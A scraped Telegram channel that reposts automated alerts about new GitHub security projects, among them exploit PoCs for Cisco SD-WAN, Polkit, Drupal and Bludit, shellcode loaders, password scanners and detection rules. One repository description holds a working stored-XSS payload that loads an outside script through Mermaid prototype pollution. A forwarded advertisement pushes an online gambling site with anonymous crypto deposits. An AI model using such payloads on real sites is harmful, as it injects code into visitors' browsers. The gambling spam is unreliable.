GitHub 红队武器库🚨
12.7K subscribers
13 photos
6 videos
18K links
📦 GitHub 全球红队渗透资源中转站。
​旨在收录那些“好用却难找”的安全项目。
🔗 定时推送:GitHub Trending (Security)
🛠 必备清单:后渗透、远控、免杀、提权工具集
📅 更新频率:每日精选,绝不灌水。
⚠️ 本频道仅供安全研究与授权测试使用。
Download Telegram
🚨 GitHub 监控消息提醒

🚨 发现关键词: #YARA #rules

📦 项目名称: detection-rules
👤 项目作者: chronicle
🛠 开发语言: Python
Star数量: 495 | 🍴 Fork数量: 130
📅 更新时间: 2026-05-26 17:34:40

📝 项目描述:
Collection of example YARA-L rules for use within Google Security Operations

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #CVE-2026 #Exploit

📦 项目名称: CVE-2026-20182
👤 项目作者: Nxploited
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 18:33:30

📝 项目描述:
Cisco Catalyst SD-WAN Peering Authentication Bypass

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #RCE #CVE

📦 项目名称: react-rsc-cve-2025-55182-lab
👤 项目作者: Jeanback1
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 18:59:58

📝 项目描述:
Educational lab demonstrating CVE-2025-55182: Critical RCE in React Server Components via prototype pollution in the Flight protocol

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Nuclei #CVE

📦 项目名称: GodSearch
👤 项目作者: kikechans
🛠 开发语言: Shell
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 19:58:38

📝 项目描述:
Universal Exploit Search & Aggregator — THE SOVEREIGN. Búsqueda híbrida (Local/GitHub/Nuclei) con priorización CVE. 󰓾 💀

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #SSRF #metadata

📦 项目名称: AliveDB
👤 项目作者: piyushkumar-prog
🛠 开发语言: TypeScript
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 19:59:17

📝 项目描述:
Self-hosted Supabase keep-alive engine. Features SSRF mitigation (RFC 1918/loopback/metadata filtering via DNS resolution checks), exponential backoff pings, and database portability (Prisma adapter with local SQLite/serverless LibSQL support).

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #SSRF #metadata

📦 项目名称: webhookery
👤 项目作者: aatuh
🛠 开发语言: Go
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 19:11:48

📝 项目描述:
Self-hosted webhook evidence and delivery control plane.

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Exploit #CVE

📦 项目名称: -GodSearch
👤 项目作者: kikechans
🛠 开发语言: Shell
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 20:01:20

📝 项目描述:
Universal Exploit Search & Aggregator — THE SOVEREIGN. Búsqueda híbrida (Local/GitHub/Nuclei) con priorización CVE. 󰓾 💀

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Sigma #rules

📦 项目名称: sigma-ai
👤 项目作者: agentshield-ai
🛠 开发语言: Python
Star数量: 13 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 20:47:34

📝 项目描述:
Sigma detection rules for AI agent security monitoring

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #BlueTeam #Detection

📦 项目名称: vtscan
👤 项目作者: ibnaleem
🛠 开发语言: Go
Star数量: 3 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 21:50:13

📝 项目描述:
🛡️ VirusTotal for the terminal

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #XSS #CVE

📦 项目名称: pocket-android-xss-0click-cve
👤 项目作者: FUNFACTOR1
🛠 开发语言: Unknown
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:56:15

📝 项目描述:
0-click XSS (CWE-79) in Mozilla Pocket Android v8.33.0.0 via unsanitized $(document.body).html(content) in articleview-mobile.js. Background service triggers execution without user interaction. Java bridge exposed. Reported to Mozilla Security 2024-07-10. Won't Fix. CVE pending.

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Burp #Extension

📦 项目名称: kingfisher-burp-suite-extension
👤 项目作者: andrebhu
🛠 开发语言: Java
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:41:27

📝 项目描述:
Burp Suite extension for Kingfisher secret scanning

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #XSS #POC #Stored

📦 项目名称: Bludit-Exploitation
👤 项目作者: AnhNg1410
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 23:40:22

📝 项目描述:
PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate user privileges from Author to Administrator.

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Nuclei #template #templates

📦 项目名称: GalSpec
👤 项目作者: jyshangguan
🛠 开发语言: Jupyter Notebook
Star数量: 5 | 🍴 Fork数量: 4
📅 更新时间: 2026-05-27 01:01:29

📝 项目描述:
Spectral Analysis of Galaxy and Active galactic Nuclei

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Exploit #CVE

📦 项目名称: CVE-2021-3560-exploit
👤 项目作者: Jeanback1
🛠 开发语言: Shell
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 00:48:29

📝 项目描述:
CVE-2021-3560 — Polkit privilege escalation exploit via accounts-daemon D-Bus race condition

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #RCE #CVE

📦 项目名称: Drupal_REST-RCE_Unauthenticated
👤 项目作者: joaoaugustom
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 01:28:32

📝 项目描述:
This exploit is based on CVE-2019-6340 and was built upon the original exploit by leonjza and the Metasploit module, extending it can be executed multiple times against the same target without waiting for cache expiration.

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Shellcode #Loader #Evasion

📦 项目名称: Shellcode-Loader
👤 项目作者: ReversingID
🛠 开发语言: C++
Star数量: 280 | 🍴 Fork数量: 49
📅 更新时间: 2026-05-27 02:34:34

📝 项目描述:
Open repository for learning dynamic shellcode loading (sample in many programming languages)

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #弱口令 #口令

📦 项目名称: mysql-weak-scan
👤 项目作者: lilu-yhl
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:16:26

📝 项目描述:
Mysql弱口令扫描工具

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #XSS #Stored

📦 项目名称: sss
👤 项目作者: yonathandoss2017
🛠 开发语言: Unknown
Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:42:33

📝 项目描述:
%%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}}} }%% %%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}}} }%% sequenceDiagram Alice->>Bob: Hi Bob Bob->>Alice: Hi Alice

🔗 点击访问项目地址
🚨 GitHub 监控消息提醒

🚨 发现关键词: #Sigma #SIEM

📦 项目名称: hybrid-ransomware-detection
👤 项目作者: vkmahalakshmi03
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:02:47

📝 项目描述:
cybersecurity soc ransomware mitre-attack sigma threat-detection siem machine-learning python blue-team

🔗 点击访问项目地址
Forwarded from Channel Help
Media is too big
VIEW IN TELEGRAM
【2028体育TG全网最大信誉平台 玩家首选
🇺🇸🇻🇳🇷🇪🇻🇪🇺🇸🇻🇳

全网每月投流费用高达千万😃 #2028体育 无处不在

免实名 专属网址: 2028vip3.com

支持USDT
OKpay等20多种虚拟币钱包 微信 支付宝 银行卡存取款

优惠 🟢返水🟢彩金 红包 全网第一
大额出款 零审核
🟢秒到账 最强信誉

首存送 复存送 投注送 豪车嫩模!
电子黄金周 周一至周日福利拿不停!
单笔出款奖励最高
😍😍😍😍😍

气运之子
PP电子 麻将大胜 100元爆25000倍250万💥

以小博大
PP电子 极速糖果1000 爆出12103倍💥

百家乐战神
真人收割机 大佬一天收割2000万💥

PG战神3月1号 独创奇迹麻将胡了两万一拉两天收割3100万 💥

天选之子3月9号 西港大佬麻将胡了1 两万一拉 爆了3400万💥

2028体育PG电子单注可拉2万一注
#PG电子单注最高爆奖可赢千万大奖

U存U提 每日提款不限额 欢迎各位大佬娱乐体验❗️

➡️ 福利频道: @PG2028TY 😀
💬 官方客服@fanxi99 👍
😳 爆庄网址: 2028vip3.com 🔗
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 GitHub 监控消息提醒

🚨 发现关键词: #CVE-2026 #POC

📦 项目名称: CVE20265172poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:05

📝 项目描述:
CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource record PoC

🔗 点击访问项目地址